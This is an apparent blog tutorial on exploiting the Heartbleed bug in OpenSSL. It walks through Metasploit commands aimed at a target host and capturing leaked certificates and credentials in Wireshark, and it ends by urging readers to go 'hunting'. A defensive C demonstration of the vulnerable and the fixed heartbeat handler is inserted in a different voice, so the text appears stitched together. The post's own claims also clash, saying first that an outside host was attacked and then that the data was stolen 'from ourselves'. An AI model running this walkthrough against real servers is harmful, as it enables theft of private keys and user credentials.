Saturday, 26 April 2014

22. Tutorial On Exploiting OpenSSL's Heartbleed Vulnerability

Well, yeah, you heard it right. In this tutorial I am going to write about exploiting the recent boom vulnerability called "Heartbleed" in OpenSSL, one of the most widely deployed cryptographic libraries.

What is HeartBleed?

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).

The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.

What data can be compromised using this attack?

Using this, I attacked a host from outside, without leaving a trace. Without using any privileged information or credentials, we were able to steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business-critical documents and communication.
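To make clear what the scanner used later in this post is actually probing for, here is an added illustration in C of the heartbeat handling bug. It is my own demo code, not code from the original post, from OpenSSL or from Metasploit. It puts a handler that trusts the 16-bit payload length in the request next to a handler with the length check that OpenSSL 1.0.1g introduced (discard any heartbeat whose header, claimed payload and minimum padding do not fit in the record actually received), and runs both against a constructed byte array that stands in for process memory. The names PROCESS_MEMORY, GOOD_RECORD, heartbeat_vulnerable and heartbeat_fixed are mine, and the record contents and the "secret" that follows it are made up for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* TLS heartbeat message (RFC 6520): type (1 byte), payload_length (2 bytes,
 * big-endian), payload, then at least 16 bytes of random padding. */
#define HB_HEADER_LEN  3
#define HB_PADDING_LEN 16

/* Constructed stand-in for process memory (assumption, not real traffic):
 * one short heartbeat request whose length field lies, followed by data
 * that must never leave the process. */
static const unsigned char PROCESS_MEMORY[] =
    "\x01"            /* type: heartbeat request */
    "\x00\x40"        /* claimed payload length: 64 bytes */
    "ping"            /* actual payload: 4 bytes */
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" /* 16 bytes of padding */
    "session_cookie=SECRET;private_key=...";   /* adjacent heap contents (constructed) */

/* A well-formed request: the claimed length matches the 4-byte payload. */
static const unsigned char GOOD_RECORD[] =
    "\x01" "\x00\x04" "ping"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

/* Bytes actually received on the wire for the lying record: 3 + 4 + 16 = 23. */
#define RECORD_LEN (HB_HEADER_LEN + 4 + HB_PADDING_LEN)
#define MEMORY_LEN (sizeof(PROCESS_MEMORY) - 1)   /* drop the literal's NUL */

static size_t claimed_payload_len(const unsigned char *msg)
{
    return (size_t)((msg[1] << 8) | msg[2]);
}

/* Vulnerable handler: builds the response from `claimed` bytes after the
 * header, trusting the peer-controlled length field and never consulting
 * how many bytes were really received. The real code read straight off
 * the heap; here the read is clamped to the demo buffer so this program
 * stays well-defined, and nothing else differs. Returns bytes copied. */
size_t heartbeat_vulnerable(const unsigned char *mem, size_t mem_len,
                            unsigned char *out, size_t out_cap)
{
    size_t n = claimed_payload_len(mem);
    if (n > mem_len - HB_HEADER_LEN) n = mem_len - HB_HEADER_LEN; /* demo-only clamp */
    if (n > out_cap) n = out_cap;
    memcpy(out, mem + HB_HEADER_LEN, n);
    return n;
}

/* Fixed handler: the 1.0.1g check. A heartbeat is silently discarded unless
 * header + claimed payload + minimum padding fits inside the received record.
 * Returns bytes echoed, or -1 if the message was discarded. */
long heartbeat_fixed(const unsigned char *mem, size_t record_len,
                     unsigned char *out, size_t out_cap)
{
    if (record_len < HB_HEADER_LEN + HB_PADDING_LEN) return -1; /* cannot even hold header + padding */
    size_t claimed = claimed_payload_len(mem);
    if (HB_HEADER_LEN + claimed + HB_PADDING_LEN > record_len) return -1; /* length field lies: discard */
    if (claimed > out_cap) return -1;
    memcpy(out, mem + HB_HEADER_LEN, claimed);
    return (long)claimed;
}

/* Does the response carry the marker string? (strstr needs a NUL, so scan by hand.) */
int response_contains(const unsigned char *buf, size_t n, const char *needle)
{
    size_t k = strlen(needle);
    for (size_t i = 0; i + k <= n; i++)
        if (memcmp(buf + i, needle, k) == 0) return 1;
    return 0;
}

/* Wrappers so callers need no buffers of their own. */
size_t vulnerable_leak_bytes(void)
{
    unsigned char out[256];
    return heartbeat_vulnerable(PROCESS_MEMORY, MEMORY_LEN, out, sizeof out);
}
int vulnerable_leaks_secret(void)
{
    unsigned char out[256];
    size_t n = heartbeat_vulnerable(PROCESS_MEMORY, MEMORY_LEN, out, sizeof out);
    return response_contains(out, n, "SECRET");
}
long fixed_on_malformed(void)
{
    unsigned char out[256];
    return heartbeat_fixed(PROCESS_MEMORY, RECORD_LEN, out, sizeof out);
}
long fixed_on_wellformed(void)
{
    unsigned char out[256];
    return heartbeat_fixed(GOOD_RECORD, sizeof GOOD_RECORD - 1, out, sizeof out);
}

int main(void)
{
    printf("vulnerable handler echoed %zu bytes for a 4-byte payload; secret leaked: %s\n",
           vulnerable_leak_bytes(), vulnerable_leaks_secret() ? "yes" : "no");
    printf("fixed handler on the same record: %s\n",
           fixed_on_malformed() < 0 ? "discarded" : "answered");
    printf("fixed handler on a well-formed record: %ld payload bytes echoed\n",
           fixed_on_wellformed());
    return 0;
}
```

Build it with any C99 compiler (for example `cc -std=c99 -Wall heartbleed_demo.c`, a file name I chose). The only difference between heartbeat_vulnerable and the pre-fix logic is the clamp that keeps the demo inside its own array; the defender's takeaway is that the fixed handler rejects the record purely from the mismatch between the length field and the record length, which is also why the scanner module used below can detect the bug without needing anything but the server's reply.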

Tutorial:

This can be attacked using the latest module that Metasploit has included in its latest update.
I am using Kali Linux here to run the Metasploit console.

Step 1:

Open a terminal in Kali Linux and run the following command:

root@Darkgrouz:~# msfconsole 

Step 2:

After msfconsole shows up with the following prompt, you are set to go:

msf>

Then issue the following command to search for the Heartbleed auxiliary module:

msf > search heartbleed

Msf will now search for the Heartbleed auxiliary module and display it.
 
Step 3:

Once you have the Heartbleed auxiliary module path, issue the following command inside msfconsole:

msf > use auxiliary/scanner/ssl/openssl_heartbleed

Once you have done it, the console prompt will look like this:

msf auxiliary(openssl_heartbleed) > 

Step 4:

Then you can go right into attacking the host.
Issue the following commands:

msf auxiliary(openssl_heartbleed) > set RHOSTS www.target.com

Then stop all other networking applications (browsers, downloads, etc.)
and start Wireshark to sniff the Heartbleed response traffic. This can be done by simply typing the command wireshark in a terminal:

root@Darkgrouz:~# wireshark
  
Then in Wireshark choose the interface you want to sniff and click Start.

Then run the following command in the msfconsole

msf auxiliary(openssl_heartbleed) > run

It will then try to exploit the vulnerability if the server is vulnerable to Heartbleed.

Step 5:

If the server is vulnerable and is exploited, it should return this:

msf auxiliary(openssl_heartbleed) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 

Step 6:

Check out the traffic sniffed in Wireshark and look for any valid data that the server returns.

I did get the server certificate and some credentials after exploiting with this.

Feel free to contact me with further doubts.

Check out your luck, folks.

** Happy Hunting :)  **